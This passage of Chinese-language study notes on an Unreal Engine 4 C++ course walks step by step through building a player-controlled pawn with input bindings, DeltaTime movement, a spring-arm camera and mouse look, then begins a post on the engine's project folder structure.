    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));

    AutoPossessPlayer = EAutoReceiveInput::Player0;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    }

    504-按键映射与轴事件绑定

    png

    ​在 Project Settings 力设置按键映射。

    ​在 MyPawn.h 里定义私有的移动函数:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    };

    MyPawn.cpp 里将按键映射与轴事件绑定:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));

    AutoPossessPlayer = EAutoReceiveInput::Player0;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    }

    void AMyPawn::MoveRight(float Value)
    {
    }

    505-使用 Tick 的移动

    ​修改 MyActor.h 里的内容,定义变量 MaxSpeedVelocity

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;
    };

    ​修改 MyPawn.cpp 里的内容,使得物体能够随着输入而移动:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    506-为何要使用 DeltaTime 进行移动

    ​使用 DeltaTime 进行移动可以使得不同帧率下的场景移动速度相等。

    • 设有两玩家,Tick 中增量 $1$ 单位
      P1 $10$ FPS,$deltatime=1/10=0.1s$
      P2 $5$ FPS,$deltatime=1/ 5=0.2s$

    • 不使用 $deltatime$ 时
      P1: $10\times1$,$1$ 秒内移动了 $10$ 单位
      P2: $5\times1$,$1$ 秒内移动了 $5$ 单位

    • 使用 $deltatime$ 时
      P1: $10\times1\times0.1=1$,$1$ 秒内移动了 $1$ 单位
      P2: $5\times1\times0.2=1$,$1$ 秒内移动了 $1$ 单位

    • FPS: Frames Per Second
      $60$ FPS 即 $1$ 秒 $60$ 帧
      $30$ FPS 即 $1$ 秒 $30$ 帧

    • Tick 每帧调用
      $deltaTime$ 为两帧之间的间隔

    png

    ​视图中这里可以显示 FPS。

    png

    Content Browser 中按 `` 输入命令t.MaxFPS 10可以将最大帧率设为10`。

    507-添加 SpringArm 组件

    ​修改 MyPawn.h 里的内容,定义变量 class USpringArmComponent* MySpringArm;

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class USpringArmComponent* MySpringArm;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;
    };

    ​修改 MyPawn.cpp 里的内容:

    ​原课程使用了:

    MySpringArm->RelativeRotation = FRotator(-45.0f, 0.0f, 0.0f);

    ​但在我这个版本中这个变量变成了私有,应该为:

    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(MyStaticMesh);
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(MySpringArm);

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    ​删除原有的 BP_MyPawn,重新创建一个。然后开跑!

    png

    508-使用 C++ 代码设置模型与材质的默认值

    ​修改 MyPawn.h 里的内容,给 UStaticMeshComponentUSpringArmComponent 添加 Get 函数。

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class USpringArmComponent* MySpringArm;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    FORCEINLINE UStaticMeshComponent* GetStaticMeshComponent() { return MyStaticMesh; }
    FORCEINLINE USpringArmComponent* GetSpringArmComponent() { return MySpringArm; }

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;
    };

    ​修改 MyPawn.cpp 里的内容:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    png

    StaticMeshAsset(TEXT()) 的里的值可以以此法获得。

    png

    MaterialAsset(TEXT()) 的里的值可以以此法获得。

    png

    ​编译后删除蓝图,重新构建 BP_MyPawn

    509-Sweep 仅对根组件生效

    ​之前的代码中:

    AddActorLocalOffset(Velocity * DeltaTime, true);

    ​开启了 Sweep 却不能使得碰撞生效,这是因为 Sweep 只能对跟组件生效,因此要修改 MyPawn.cpp,将 MyStaticMesh 设为根组件:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    // RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    RootComponent = MyStaticMesh;
    MyStaticMesh->SetCollisionProfileName(TEXT("Pawn"));

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    510-控制视野上下查看

    png

    Project Settings 里添加两个轴 LookUpLookRight

    ​修改 MyPawn.h 里的内容,定义函数 LookUp()LookRight(),鼠标的输入 MouseInput

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class USpringArmComponent* MySpringArm;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    FORCEINLINE UStaticMeshComponent* GetStaticMeshComponent() { return MyStaticMesh; }
    FORCEINLINE USpringArmComponent* GetSpringArmComponent() { return MySpringArm; }

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;

    void LookUp(float Value);
    void LookRight(float Value);
    FVector2D MouseInput;
    };

    ​修改 MyPawn.cpp 里的内容,完成视野随鼠标向上下查看的功能:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    // RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    RootComponent = MyStaticMesh;
    MyStaticMesh->SetCollisionProfileName(TEXT("Pawn"));

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);

    // X, Y, Z 在虚幻的旋转轴对应 Roll, Pitch, Yaw
    FRotator NewSpringArmRotation = MySpringArm->GetComponentRotation();
    NewSpringArmRotation.Pitch = FMath::Clamp(NewSpringArmRotation.Pitch += MouseInput.Y, -80.0f, 0.0f);
    MySpringArm->SetWorldRotation(NewSpringArmRotation);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    PlayerInputComponent->BindAxis(TEXT("LookUp"), this, &AMyPawn::LookUp);
    PlayerInputComponent->BindAxis(TEXT("LookRight"), this, &AMyPawn::LookRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::LookUp(float Value)
    {
    MouseInput.Y = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    void AMyPawn::LookRight(float Value)
    {
    MouseInput.X = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    511-使用 Controller 控制视野左右旋转

    ​修改 MyPawn.cpp 里的内容,完成视野随鼠标向左右查看的功能(AddControllerYawInput(MouseInput.X);):

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    // RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    RootComponent = MyStaticMesh;
    MyStaticMesh->SetCollisionProfileName(TEXT("Pawn"));

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;
    bUseControllerRotationRoll = true;
    bUseControllerRotationPitch = true;
    bUseControllerRotationYaw = true;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);

    // X, Y, Z 在虚幻的旋转轴对应 Roll, Pitch, Yaw
    AddControllerYawInput(MouseInput.X);

    FRotator NewSpringArmRotation = MySpringArm->GetComponentRotation();
    NewSpringArmRotation.Pitch = FMath::Clamp(NewSpringArmRotation.Pitch += MouseInput.Y, -80.0f, 0.0f);
    MySpringArm->SetWorldRotation(NewSpringArmRotation);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    PlayerInputComponent->BindAxis(TEXT("LookUp"), this, &AMyPawn::LookUp);
    PlayerInputComponent->BindAxis(TEXT("LookRight"), this, &AMyPawn::LookRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::LookUp(float Value)
    {
    MouseInput.Y = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    void AMyPawn::LookRight(float Value)
    {
    MouseInput.X = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    png

    这些属性是用于控制 Pawn 的旋转是否受控制器的旋转影响。具体说明如下:

    • bUseControllerRotationRoll:设置为 true 时,表示 Pawn 的 Roll 旋转将受控制器的 Roll 旋转影响。
    • bUseControllerRotationPitch:设置为 true 时,表示 Pawn 的 Pitch 旋转将受控制器的 Pitch 旋转影响。
    • bUseControllerRotationYaw:设置为 true 时,表示 Pawn 的 Yaw 旋转将受控制器的 Yaw 旋转影响。

    当这些属性被设置为 true 时,Pawn 的旋转将由控制器来决定,而不是由组件自身的旋转规则决定。这在某些情况下非常有用,例如第一人称或第三人称视角的角色控制,其中玩家可以通过控制器来旋转角色的方向。

    ]]>
    + 资源

    环境配置

    ​还是把版本换成 UE4.27 吧,让它支持 VS2022。

    课程

    202-Unreal 项目文件结构解读

    一些子目录是在引擎和游戏项目目录之间通用的:

    • Binaries - 包含可执行文件或编译期间创建的其他文件。

    • Build - 包含构建引擎或游戏所需的文件,包括创建特定于平台的构建版所需的文件。

    • Config - 配置文件,用于设置用来控制引擎行为的值。项目 Config 文件中设置的值会覆盖 Engine\Config 目录中设置的值。

    • Content - 保存引擎或游戏的内容,包括资源包和贴图。

    • DerivedDataCache - 包含加载时针对引用内容生成的派生数据文件。引用内容没有相应的缓存文件会导致加载时间显著延长。

    • Intermediate - 包含构建引擎或游戏时生成的临时文件。在游戏目录中,着色器存储在 Intermediate 目录中。

    • Saved - 包含自动保存、配置(.ini)文件和日志文件。此外,Engine\Saved 目录还包含崩溃日志、硬件信息和 Swarm 选项与数据。

    • Source - 包含引擎或游戏的所有源文件,包括引擎源代码、工具和游戏类等。

      • Engine - Engine 目录中的源文件组织结构如下:

